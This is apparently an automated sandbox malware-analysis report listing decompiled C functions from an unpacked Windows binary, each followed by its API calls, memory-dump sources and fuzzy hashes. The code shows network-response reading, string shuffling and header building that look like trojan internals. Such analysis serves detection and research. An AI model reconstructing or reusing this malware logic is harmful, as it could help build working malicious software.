                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                  							L29:
                                                                                                                                  							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t46 =  *0xa3d130(0, 1,  &_v24); // executed
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_v8 = 8;
                                                                                                                                  							} else {
                                                                                                                                  								_t47 = E00A375F6(0x1000);
                                                                                                                                  								_v20 = _t47;
                                                                                                                                  								if(_t47 == 0) {
                                                                                                                                  									_v8 = 8;
                                                                                                                                  								} else {
                                                                                                                                  									goto L8;
                                                                                                                                  									do {
                                                                                                                                  										while(1) {
                                                                                                                                  											L8:
                                                                                                                                  											_t50 = _v12;
                                                                                                                                  											if(_t50 >= 0x1000) {
                                                                                                                                  												_t50 = 0x1000;
                                                                                                                                  											}
                                                                                                                                  											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                                                                                                                  											if(_t50 == 0) {
                                                                                                                                  												break;
                                                                                                                                  											}
                                                                                                                                  											_t57 = _v24;
                                                                                                                                  											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                                                                                                                  											_t18 =  &_v12;
                                                                                                                                  											 *_t18 = _v12 - _v16;
                                                                                                                                  											if( *_t18 != 0) {
                                                                                                                                  												continue;
                                                                                                                                  											} else {
                                                                                                                                  											}
                                                                                                                                  											L14:
                                                                                                                                  											if(WaitForSingleObject( *0xa3d2a4, 0) != 0x102) {
                                                                                                                                  												_v8 = 0x102;
                                                                                                                                  											} else {
                                                                                                                                  												_t55 =  &_v12;
                                                                                                                                  												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                                                                                                                                  												if(_t55 != 0) {
                                                                                                                                  													goto L19;
                                                                                                                                  												} else {
                                                                                                                                  													_t56 = GetLastError();
                                                                                                                                  													_v8 = _t56;
                                                                                                                                  													if(_t56 == 0x2f78 && _v12 == 0) {
                                                                                                                                  														_v8 = 0;
                                                                                                                                  														goto L19;
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  											L22:
                                                                                                                                  											E00A34AAB(_v20);
                                                                                                                                  											if(_v8 == 0) {
                                                                                                                                  												_t54 = E00A33B3F(_v24, _t74); // executed
                                                                                                                                  												_v8 = _t54;
                                                                                                                                  											}
                                                                                                                                  											goto L25;
                                                                                                                                  										}
                                                                                                                                  										_v8 = GetLastError();
                                                                                                                                  										goto L14;
                                                                                                                                  										L19:
                                                                                                                                  									} while (_v12 != 0);
                                                                                                                                  									goto L22;
                                                                                                                                  								}
                                                                                                                                  								L25:
                                                                                                                                  								_t48 = _v24;
                                                                                                                                  								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _v8;
                                                                                                                                  				} else {
                                                                                                                                  					_t60 = E00A3121A(__eax); // executed
                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                  						return _t60;
                                                                                                                                  					} else {
                                                                                                                                  						goto L2;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 00A376AF
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A376CF
                                                                                                                                    • Part of subcall function 00A3121A: wcstombs.NTDLL ref: 00A312DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2344289193-3251738875
                                                                                                                                  • Opcode ID: e7f64f2866c93fb452088f44aad2977a37d4470c4f6fd8ee9d0523c8cce31c1d
                                                                                                                                  • Instruction ID: ec62a678b44a1f870ed647d6c299fb4b4b89ebf95e0cded13159780cd18fa7a4
                                                                                                                                  • Opcode Fuzzy Hash: e7f64f2866c93fb452088f44aad2977a37d4470c4f6fd8ee9d0523c8cce31c1d
                                                                                                                                  • Instruction Fuzzy Hash: BD412AB5904219EFDF20EFA8DD859AEBBB8FB04344F204869F402E3111D7309E41DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                  			E00A39311(void** __esi) {
                                                                                                                                  				intOrPtr _v0;
                                                                                                                                  				intOrPtr _t4;
                                                                                                                                  				intOrPtr _t6;
                                                                                                                                  				void* _t8;
                                                                                                                                  				void* _t9;
                                                                                                                                  				intOrPtr _t10;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void** _t13;
                                                                                                                                  
                                                                                                                                  				_t13 = __esi;
                                                                                                                                  				_t4 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  				__imp__(_t4 + 0x40);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t6 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                  					if( *_t1 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					Sleep(0xa);
                                                                                                                                  				}
                                                                                                                                  				_t8 =  *_t13;
                                                                                                                                  				if(_t8 != 0 && _t8 != 0xa3d030) {
                                                                                                                                  					HeapFree( *0xa3d270, 0, _t8);
                                                                                                                                  				}
                                                                                                                                  				_t9 = E00A35141(_v0, _t13); // executed
                                                                                                                                  				_t13[1] = _t9;
                                                                                                                                  				_t10 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  				_t11 = _t10 + 0x40;
                                                                                                                                  				__imp__(_t11);
                                                                                                                                  				return _t11;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A3931A
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00A35390), ref: 00A39324
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,00A35390), ref: 00A3934C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A39368
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 3914f0dcd4129cd7b05b4865ec809339163a0764a77c01ec44a6a2dec114dfe8
                                                                                                                                  • Instruction ID: 61b4936e0d3fe9a9b13c67779c1fea49b3f4a14074ca1985a303c4d6f1f00944
                                                                                                                                  • Opcode Fuzzy Hash: 3914f0dcd4129cd7b05b4865ec809339163a0764a77c01ec44a6a2dec114dfe8
                                                                                                                                  • Instruction Fuzzy Hash: F1F0D4B1A04280DBEB28DFB9EE89B163BA4BB16740F044418B552DB2A1C760DD52CB15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E00A3520D(signed int __edx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				CHAR* _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t21;
                                                                                                                                  				CHAR* _t22;
                                                                                                                                  				CHAR* _t25;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				void* _t27;
                                                                                                                                  				void* _t31;
                                                                                                                                  				void* _t32;
                                                                                                                                  				CHAR* _t36;
                                                                                                                                  				CHAR* _t42;
                                                                                                                                  				CHAR* _t43;
                                                                                                                                  				CHAR* _t44;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t51;
                                                                                                                                  				CHAR* _t54;
                                                                                                                                  				signed char _t56;
                                                                                                                                  				intOrPtr _t58;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				void* _t62;
                                                                                                                                  				CHAR* _t65;
                                                                                                                                  				CHAR* _t66;
                                                                                                                                  				char* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  
                                                                                                                                  				_t61 = __edx;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_t21 = E00A3154A();
                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                  					_t59 =  *0xa3d294; // 0x2000000a
                                                                                                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                  					 *0xa3d294 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                  				}
                                                                                                                                  				_t22 =  *0xa3d12c(0, 2); // executed
                                                                                                                                  				_v16 = _t22;
                                                                                                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                  					_t25 = E00A321DE( &_v8,  &_v20); // executed
                                                                                                                                  					_t54 = _t25;
                                                                                                                                  					_t26 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					if( *0xa3d294 > 5) {
                                                                                                                                  						_t8 = _t26 + 0xa3e5cd; // 0x4d283a53
                                                                                                                                  						_t27 = _t8;
                                                                                                                                  					} else {
                                                                                                                                  						_t7 = _t26 + 0xa3e9f9; // 0x44283a44
                                                                                                                                  						_t27 = _t7;
                                                                                                                                  					}
                                                                                                                                  					E00A311F4(_t27, _t27);
                                                                                                                                  					_t31 = E00A33598(_t61,  &_v20,  &_v12); // executed
                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                  						CloseHandle(_v20);
                                                                                                                                  					}
                                                                                                                                  					_t62 = 5;
                                                                                                                                  					if(_t54 != _t62) {
                                                                                                                                  						 *0xa3d2a8 =  *0xa3d2a8 ^ 0x81bbe65d;
                                                                                                                                  						_t32 = E00A375F6(0x60);
                                                                                                                                  						 *0xa3d364 = _t32;
                                                                                                                                  						__eflags = _t32;
                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                  							_push(8);
                                                                                                                                  							_pop(0);
                                                                                                                                  						} else {
                                                                                                                                  							memset(_t32, 0, 0x60);
                                                                                                                                  							_t49 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  							_t68 = _t68 + 0xc;
                                                                                                                                  							__imp__(_t49 + 0x40);
                                                                                                                                  							_t51 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  							 *_t51 = 0xa3e823;
                                                                                                                                  						}
                                                                                                                                  						_t54 = 0;
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						if(0 == 0) {
                                                                                                                                  							_t36 = RtlAllocateHeap( *0xa3d270, 0, 0x43);
                                                                                                                                  							 *0xa3d300 = _t36;
                                                                                                                                  							__eflags = _t36;
                                                                                                                                  							if(_t36 == 0) {
                                                                                                                                  								_push(8);
                                                                                                                                  								_pop(0);
                                                                                                                                  							} else {
                                                                                                                                  								_t56 =  *0xa3d294; // 0x2000000a
                                                                                                                                  								_t61 = _t56 & 0x000000ff;
                                                                                                                                  								_t58 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  								_t13 = _t58 + 0xa3e55a; // 0x697a6f4d
                                                                                                                                  								_t55 = _t13;
                                                                                                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xa3c2a7);
                                                                                                                                  							}
                                                                                                                                  							_t54 = 0;
                                                                                                                                  							__eflags = 0;
                                                                                                                                  							if(0 == 0) {
                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                  								E00A3A82B( ~_v8 &  *0xa3d2a8, 0xa3d00c); // executed
                                                                                                                                  								_t42 = E00A34C40(_t55); // executed
                                                                                                                                  								_t54 = _t42;
                                                                                                                                  								__eflags = _t54;
                                                                                                                                  								if(_t54 != 0) {
                                                                                                                                  									goto L30;
                                                                                                                                  								}
                                                                                                                                  								_t43 = E00A374A5(); // executed
                                                                                                                                  								__eflags = _t43;
                                                                                                                                  								if(_t43 != 0) {
                                                                                                                                  									__eflags = _v8;
                                                                                                                                  									_t65 = _v12;
                                                                                                                                  									if(_v8 != 0) {
                                                                                                                                  										L29:
                                                                                                                                  										_t44 = E00A35461(_t61, _t65, _v8); // executed
                                                                                                                                  										_t54 = _t44;
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t65;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									_t54 = E00A33FC2(__eflags,  &(_t65[4]));
                                                                                                                                  									__eflags = _t54;
                                                                                                                                  									if(_t54 == 0) {
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									goto L29;
                                                                                                                                  								}
                                                                                                                                  								_t54 = 8;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t66 = _v12;
                                                                                                                                  						if(_t66 == 0) {
                                                                                                                                  							L30:
                                                                                                                                  							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                  								 *0xa3d128();
                                                                                                                                  							}
                                                                                                                                  							goto L34;
                                                                                                                                  						}
                                                                                                                                  						_t67 =  &(_t66[4]);
                                                                                                                                  						do {
                                                                                                                                  						} while (E00A35AB2(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                  					}
                                                                                                                                  					goto L30;
                                                                                                                                  				} else {
                                                                                                                                  					_t54 = _t22;
                                                                                                                                  					L34:
                                                                                                                                  					return _t54;
                                                                                                                                  				}
                                                                                                                                  			}































                                                                                                                                  0x00a35356
                                                                                                                                  0x00a35356
                                                                                                                                  0x00a3535e
                                                                                                                                  0x00a35367
                                                                                                                                  0x00a3536e
                                                                                                                                  0x00a35370
                                                                                                                                  0x00a35372
                                                                                                                                  0x00a35379
                                                                                                                                  0x00a35386
                                                                                                                                  0x00a3538b
                                                                                                                                  0x00a35390
                                                                                                                                  0x00a35392
                                                                                                                                  0x00a35394
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35396
                                                                                                                                  0x00a3539b
                                                                                                                                  0x00a3539d
                                                                                                                                  0x00a353a4
                                                                                                                                  0x00a353a8
                                                                                                                                  0x00a353ab
                                                                                                                                  0x00a353c0
                                                                                                                                  0x00a353c4
                                                                                                                                  0x00a353c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353c9
                                                                                                                                  0x00a353ad
                                                                                                                                  0x00a353af
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353ba
                                                                                                                                  0x00a353bc
                                                                                                                                  0x00a353be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353be
                                                                                                                                  0x00a353a1
                                                                                                                                  0x00a353a1
                                                                                                                                  0x00a35372
                                                                                                                                  0x00a352b0
                                                                                                                                  0x00a352b0
                                                                                                                                  0x00a352b5
                                                                                                                                  0x00a353cb
                                                                                                                                  0x00a353cf
                                                                                                                                  0x00a353d7
                                                                                                                                  0x00a353d7
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353cf
                                                                                                                                  0x00a352bb
                                                                                                                                  0x00a352be
                                                                                                                                  0x00a352c8
                                                                                                                                  0x00a352cf
                                                                                                                                  0x00000000
                                                                                                                                  0x00a353df
                                                                                                                                  0x00a353df
                                                                                                                                  0x00a353e3
                                                                                                                                  0x00a353e7
                                                                                                                                  0x00a353e7

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A3154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A35226,00000000,00000000), ref: 00A31559
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00A352A3
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • memset.NTDLL ref: 00A352F2
                                                                                                                                  • RtlInitializeCriticalSection.NTDLL(033A9570), ref: 00A35303
                                                                                                                                    • Part of subcall function 00A33FC2: memset.NTDLL ref: 00A33FD7
                                                                                                                                    • Part of subcall function 00A33FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00A34019
                                                                                                                                    • Part of subcall function 00A33FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00A34024
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00A3532E
                                                                                                                                  • wsprintfA.USER32 ref: 00A3535E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4246211962-0
                                                                                                                                  • Opcode ID: 13b122590d131c8a36696576b6d9d2489459ce2a1a6340eda808f5a275089418
                                                                                                                                  • Instruction ID: c86ba67e3ad50cf91d054aba6187e6f415777ea7697ed486b9e3dc3287e83842
                                                                                                                                  • Opcode Fuzzy Hash: 13b122590d131c8a36696576b6d9d2489459ce2a1a6340eda808f5a275089418
                                                                                                                                  • Instruction Fuzzy Hash: 2451D171E40B14EFDB20EBF8EDA9BAF73B8AB04750F140425F502EB151E7B099458B90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                  			E00A378E6(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				intOrPtr _t81;
                                                                                                                                  				char _t83;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t97;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				char _t101;
                                                                                                                                  				unsigned int _t102;
                                                                                                                                  				intOrPtr _t103;
                                                                                                                                  				char* _t107;
                                                                                                                                  				signed int _t110;
                                                                                                                                  				signed int _t113;
                                                                                                                                  				signed int _t118;
                                                                                                                                  				signed int _t122;
                                                                                                                                  				intOrPtr _t124;
                                                                                                                                  
                                                                                                                                  				_t102 = _a8;
                                                                                                                                  				_t118 = 0;
                                                                                                                                  				_v20 = __eax;
                                                                                                                                  				_t122 = (_t102 >> 2) + 1;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_a8 = 0;
                                                                                                                                  				_t81 = E00A375F6(_t122 << 2);
                                                                                                                                  				_v16 = _t81;
                                                                                                                                  				if(_t81 == 0) {
                                                                                                                                  					_push(8);
                                                                                                                                  					_pop(0);
                                                                                                                                  					L37:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_t107 = _a4;
                                                                                                                                  				_a4 = _t102;
                                                                                                                                  				_t113 = 0;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t83 =  *_t107;
                                                                                                                                  					if(_t83 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                                  						if(_t118 != 0) {
                                                                                                                                  							if(_t118 > _v8) {
                                                                                                                                  								_v8 = _t118;
                                                                                                                                  							}
                                                                                                                                  							_a8 = _a8 + 1;
                                                                                                                                  							_t118 = 0;
                                                                                                                                  						}
                                                                                                                                  						 *_t107 = 0;
                                                                                                                                  						goto L16;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t118 != 0) {
                                                                                                                                  							L10:
                                                                                                                                  							_t118 = _t118 + 1;
                                                                                                                                  							L16:
                                                                                                                                  							_t107 = _t107 + 1;
                                                                                                                                  							_t15 =  &_a4;
                                                                                                                                  							 *_t15 = _a4 - 1;
                                                                                                                                  							if( *_t15 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t113 == _t122) {
                                                                                                                                  							L21:
                                                                                                                                  							if(_a8 <= 0x20) {
                                                                                                                                  								_push(0xb);
                                                                                                                                  								L34:
                                                                                                                                  								_pop(0);
                                                                                                                                  								L35:
                                                                                                                                  								E00A34AAB(_v16);
                                                                                                                                  								goto L37;
                                                                                                                                  							}
                                                                                                                                  							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                                  							_t103 = E00A375F6((_v8 + _t24) * _a8 + 4);
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_push(8);
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							_t90 = _a8;
                                                                                                                                  							_a4 = _a4 & 0x00000000;
                                                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                                                  							_t124 = _t103 + _t90 * 4;
                                                                                                                                  							if(_t90 <= 0) {
                                                                                                                                  								L31:
                                                                                                                                  								 *0xa3d2b0 = _t103;
                                                                                                                                  								goto L35;
                                                                                                                                  							}
                                                                                                                                  							do {
                                                                                                                                  								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                                  								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                                  								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                                  								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                                  								_v12 = _v12 & 0x00000000;
                                                                                                                                  								if(_a4 <= 0) {
                                                                                                                                  									goto L30;
                                                                                                                                  								} else {
                                                                                                                                  									goto L26;
                                                                                                                                  								}
                                                                                                                                  								while(1) {
                                                                                                                                  									L26:
                                                                                                                                  									_t99 = _v12;
                                                                                                                                  									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                                  									if(_t99 == 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									_v12 = _v12 + 1;
                                                                                                                                  									if(_v12 < _a4) {
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  									goto L30;
                                                                                                                                  								}
                                                                                                                                  								_v8 = _v8 - 1;
                                                                                                                                  								L30:
                                                                                                                                  								_t97 = _a4;
                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                  								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                                  								__imp__(_t124);
                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                  								_t124 = _t124 + _t97 + 1;
                                                                                                                                  							} while (_v8 < _a8);
                                                                                                                                  							goto L31;
                                                                                                                                  						}
                                                                                                                                  						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                                  						_t101 = _t83;
                                                                                                                                  						if(_t83 - 0x61 <= 0x19) {
                                                                                                                                  							_t101 = _t101 - 0x20;
                                                                                                                                  						}
                                                                                                                                  						 *_t107 = _t101;
                                                                                                                                  						_t113 = _t113 + 1;
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				if(_t118 != 0) {
                                                                                                                                  					if(_t118 > _v8) {
                                                                                                                                  						_v8 = _t118;
                                                                                                                                  					}
                                                                                                                                  					_a8 = _a8 + 1;
                                                                                                                                  				}
                                                                                                                                  				goto L21;
                                                                                                                                  			}






















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00A379E3
                                                                                                                                  • lstrcat.KERNEL32(69B25F45,00000020), ref: 00A379F8
                                                                                                                                  • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00A37A0F
                                                                                                                                  • lstrlen.KERNEL32(69B25F45), ref: 00A37A33
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3214092121-3916222277
                                                                                                                                  • Opcode ID: 9e90c592827bb58de47b4becda9b6733a05067e5dcf7b8a58220d381d5c5b54c
                                                                                                                                  • Instruction ID: 828a43a9add1b99210ea30a79c5f5789d8a04475e7c2d2f8d6a2bf4d04c2bedf
                                                                                                                                  • Opcode Fuzzy Hash: 9e90c592827bb58de47b4becda9b6733a05067e5dcf7b8a58220d381d5c5b54c
                                                                                                                                  • Instruction Fuzzy Hash: 6251CEB1A08218EFCF21DF99C984BADBBB6FF45364F14815AF854AB211C730AB01CB40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 18%
                                                                                                                                  			E00A3121A(void* __esi) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				long* _v20;
                                                                                                                                  				long _t36;
                                                                                                                                  				long* _t47;
                                                                                                                                  				intOrPtr* _t63;
                                                                                                                                  				intOrPtr* _t64;
                                                                                                                                  				char* _t65;
                                                                                                                                  
                                                                                                                                  				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                                                  				_t63 = __esi + 0x2c;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				 *_t63 = 0;
                                                                                                                                  				_v12 = _t36;
                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					return _v12;
                                                                                                                                  				}
                                                                                                                                  				_v8 = 4;
                                                                                                                                  				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                                                                                                                                  				if(_t36 == 0) {
                                                                                                                                  					L11:
                                                                                                                                  					_v12 = GetLastError();
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  				_push( &_v16);
                                                                                                                                  				_push( &_v8);
                                                                                                                                  				_push(_t63);
                                                                                                                                  				_t64 = __imp__; // 0x6fa7fd20
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(0x20000013);
                                                                                                                                  				_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                  				if( *_t64() == 0) {
                                                                                                                                  					goto L11;
                                                                                                                                  				} else {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                                                                                                  					_t47 = E00A375F6(_v8 + 2);
                                                                                                                                  					_v20 = _t47;
                                                                                                                                  					if(_t47 == 0) {
                                                                                                                                  						_v12 = 8;
                                                                                                                                  					} else {
                                                                                                                                  						_push( &_v16);
                                                                                                                                  						_push( &_v8);
                                                                                                                                  						_push(_t47);
                                                                                                                                  						_push(0);
                                                                                                                                  						_push(0x16);
                                                                                                                                  						_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                  						if( *_t64() == 0) {
                                                                                                                                  							_v12 = GetLastError();
                                                                                                                                  						} else {
                                                                                                                                  							_v8 = _v8 >> 1;
                                                                                                                                  							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                                                                                                  							_t65 = E00A375F6(_v8 + 1);
                                                                                                                                  							if(_t65 == 0) {
                                                                                                                                  								_v12 = 8;
                                                                                                                                  							} else {
                                                                                                                                  								wcstombs(_t65, _v20, _v8 + 1);
                                                                                                                                  								 *(__esi + 0xc) = _t65;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						E00A34AAB(_v20);
                                                                                                                                  					}
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A3130E
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • wcstombs.NTDLL ref: 00A312DC
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A312F2
                                                                                                                                  Strings
